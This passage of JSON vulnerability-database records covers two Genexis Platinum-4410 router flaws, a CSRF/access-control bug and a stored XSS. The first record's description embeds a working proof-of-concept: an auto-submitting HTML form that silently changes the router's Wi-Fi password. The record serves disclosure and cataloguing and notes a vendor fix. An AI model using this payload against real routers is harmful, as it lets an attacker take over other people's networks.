"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point\u2019s password. Genexis Platinum 4410 Contains a cross-site request forgery vulnerability.Information may be tampered with. Genexis Platinum 4410 is a router of genexis. An attacker can use this vulnerability to send unexpected requests to the server through the affected client. # Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF\n# Date: 28-08-2020\n# Vendor Homepage: https://www.gxgroup.eu/ont-products/\n# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)\n# Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/\n# Version: v2.1 (software version P4410-V2-1.28)\n# CVE : CVE-2020-25015\n\n1. \n\n2. \n\n3. Proof of Concept\n\nCreate an HTML file with the following code:\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/cgi-bin/net-wlan.asp\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"wlEnbl\" value=\"ON\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys0\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys1\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys2\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys3\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlgMode\" value=\"9\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlAuthMode\" value=\"WPAPSKWPA2PSK\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlEnbl\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"hWPSMode\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"henableSsid\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlHide\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"isInWPSing\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"WpsConfModeAll\" value=\"7\" /\u003e\n \u003cinput type=\"hidden\" name=\"WpsConfModeNone\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"hWpsStart\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"isCUCSupport\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"SSIDPre\" value=\"N\u0026#47;A\" /\u003e\n \u003cinput type=\"hidden\" name=\"bwControlhidden\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"ht\u0026#95;bw\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlgMode\" value=\"b\u0026#44;g\u0026#44;n\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlChannel\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlTxPwr\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlSsidIdx\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"SSID\u0026#95;Flag\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlSsid\" value=\"JINSON\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlMcs\" value=\"33\" /\u003e\n \u003cinput type=\"hidden\" name=\"bwControl\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"giControl\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"enableSsid\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlAssociateNum\" value=\"32\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlSecurMode\" value=\"WPAand11i\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlPreauth\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlNetReauth\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlWpaPsk\" value=\"NEWPASSWORD\" /\u003e\n \u003cinput type=\"hidden\" name=\"cb\u0026#95;enablshowpsw\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlWpaGtkRekey\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlRadiusIPAddr\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlRadiusPort\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlRadiusKey\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlWpa\" value=\"TKIPAES\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeyBit\" value=\"64\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"WpsActive\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"wpsmode\" value=\"ap\u0026#45;pbc\" /\u003e\n \u003cinput type=\"hidden\" name=\"pinvalue\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"Save\u0026#95;Flag\" value=\"1\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003cscript\u003e\n document.forms[0].submit();\n \u003c/script\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\nOpen this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD\n\n\n4. PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk\u0026feature=emb_title\n\n3. Timeline\n\nVulnerability reported to the Genexis team \u2013 August 28, 2020\nTeam confirmed firmware release containing fix \u2013 September 14, 2020\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "PACKETSTORM",
"id": "159936"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-25015",
"trust": 3.2
},
{
"db": "PACKETSTORM",
"id": "159936",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-56086",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "49000",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2020-25015",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"id": "VAR-202009-0727",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
}
],
"trust": 1.3232142850000002
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
}
]
},
"last_update_date": "2024-02-13T23:03:44.191000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.gxgroup.eu/"
},
{
"title": "Patch for Genexis Platinum cross-site request forgery vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/236092"
},
{
"title": "Genexis Platinum Fixes for cross-site request forgery vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=128996"
},
{
"title": "https://github.com/jinsonvarghese/jinsonvarghese",
"trust": 0.1,
"url": "https://github.com/jinsonvarghese/jinsonvarghese "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.0
},
{
"problemtype": "Cross-site request forgery (CWE-352) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/159936/genexis-platinum-4410-p4410-v2-1.28-missing-access-control-csrf.html"
},
{
"trust": 2.6,
"url": "https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/"
},
{
"trust": 2.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25015"
},
{
"trust": 1.7,
"url": "https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/49000"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/352.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/jinsonvarghese/jinsonvarghese"
},
{
"trust": 0.1,
"url": "https://www.gxgroup.eu/ont-products/"
},
{
"trust": 0.1,
"url": "https://www.youtube.com/watch?v=nsu5andh2rk\u0026feature=emb_title"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/cgi-bin/net-wlan.asp\""
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-10-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"date": "2020-09-16T00:00:00",
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"date": "2021-03-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"date": "2020-11-09T17:26:50",
"db": "PACKETSTORM",
"id": "159936"
},
{
"date": "2020-09-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"date": "2020-09-16T18:15:13.390000",
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-10-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"date": "2022-11-16T00:00:00",
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"date": "2021-03-24T06:57:00",
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"date": "2020-11-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"date": "2022-11-16T14:14:45.577000",
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Genexis Platinum cross-site request forgery vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 0.6
}
}
VAR-202010-1001
Vulnerability from variot - Updated: 2023-12-18 13:56Genexis Platinum-4410 P4410-V2-1.28 devices allow stored XSS in the WLAN SSID parameter. This could allow an attacker to perform malicious actions in which the XSS popup will affect all privileged users. Genexis Platinum-4410 Contains a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. Genexis Platinum-4410 is a wireless router of British Genexis company.
Genexis Platinum-4410 P4410-V2-1.28 has a cross-site scripting vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202010-1001",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "platinum-4410",
"scope": "eq",
"trust": 1.0,
"vendor": "genexis",
"version": "1.28"
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": "genexis platinum-4410 firmware p4410-v2-1.28"
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": null
},
{
"model": "platinum-4410 p4410-v2-1.28",
"scope": null,
"trust": 0.6,
"vendor": "genexis",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63198"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-012844"
},
{
"db": "NVD",
"id": "CVE-2020-27980"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:genexis:platinum-4410_firmware:1.28:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:genexis:platinum-4410:v2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-27980"
}
]
},
"cve": "CVE-2020-27980",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.5,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2020-27980",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "CNVD-2020-63198",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2020-27980",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-27980",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2020-63198",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-202010-1598",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63198"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-012844"
},
{
"db": "NVD",
"id": "CVE-2020-27980"
},
{
"db": "CNNVD",
"id": "CNNVD-202010-1598"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Genexis Platinum-4410 P4410-V2-1.28 devices allow stored XSS in the WLAN SSID parameter. This could allow an attacker to perform malicious actions in which the XSS popup will affect all privileged users. Genexis Platinum-4410 Contains a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. Genexis Platinum-4410 is a wireless router of British Genexis company. \n\r\n\r\nGenexis Platinum-4410 P4410-V2-1.28 has a cross-site scripting vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-27980"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-012844"
},
{
"db": "CNVD",
"id": "CNVD-2020-63198"
},
{
"db": "VULMON",
"id": "CVE-2020-27980"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-27980",
"trust": 3.1
},
{
"db": "EXPLOIT-DB",
"id": "48948",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2020-012844",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-63198",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202010-1598",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2020-27980",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63198"
},
{
"db": "VULMON",
"id": "CVE-2020-27980"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-012844"
},
{
"db": "NVD",
"id": "CVE-2020-27980"
},
{
"db": "CNNVD",
"id": "CNNVD-202010-1598"
}
]
},
"id": "VAR-202010-1001",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63198"
}
],
"trust": 1.3232142850000002
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63198"
}
]
},
"last_update_date": "2023-12-18T13:56:05.183000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Platinum",
"trust": 0.8,
"url": "https://genexis.eu/product/platinum/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-012844"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
},
{
"problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-012844"
},
{
"db": "NVD",
"id": "CVE-2020-27980"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.exploit-db.com/exploits/48948"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27980"
},
{
"trust": 1.7,
"url": "https://genexis.eu/product/platinum/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63198"
},
{
"db": "VULMON",
"id": "CVE-2020-27980"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-012844"
},
{
"db": "NVD",
"id": "CVE-2020-27980"
},
{
"db": "CNNVD",
"id": "CNNVD-202010-1598"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-63198"
},
{
"db": "VULMON",
"id": "CVE-2020-27980"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-012844"
},
{
"db": "NVD",
"id": "CVE-2020-27980"
},
{
"db": "CNNVD",
"id": "CNNVD-202010-1598"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-11-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-63198"
},
{
"date": "2020-10-28T00:00:00",
"db": "VULMON",
"id": "CVE-2020-27980"
},
{
"date": "2021-06-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-012844"
},
{
"date": "2020-10-28T19:15:14.107000",
"db": "NVD",
"id": "CVE-2020-27980"
},
{
"date": "2020-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202010-1598"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-11-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-63198"
},
{
"date": "2020-11-04T00:00:00",
"db": "VULMON",
"id": "CVE-2020-27980"
},
{
"date": "2021-06-09T07:37:00",
"db": "JVNDB",
"id": "JVNDB-2020-012844"
},
{
"date": "2020-11-04T19:18:43.083000",
"db": "NVD",
"id": "CVE-2020-27980"
},
{
"date": "2020-11-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202010-1598"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202010-1598"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Genexis Platinum-4410 cross-site scripting vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63198"
},
{
"db": "CNNVD",
"id": "CNNVD-202010-1598"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202010-1598"
}
],
"trust": 0.6
}
}
VAR-202111-0723
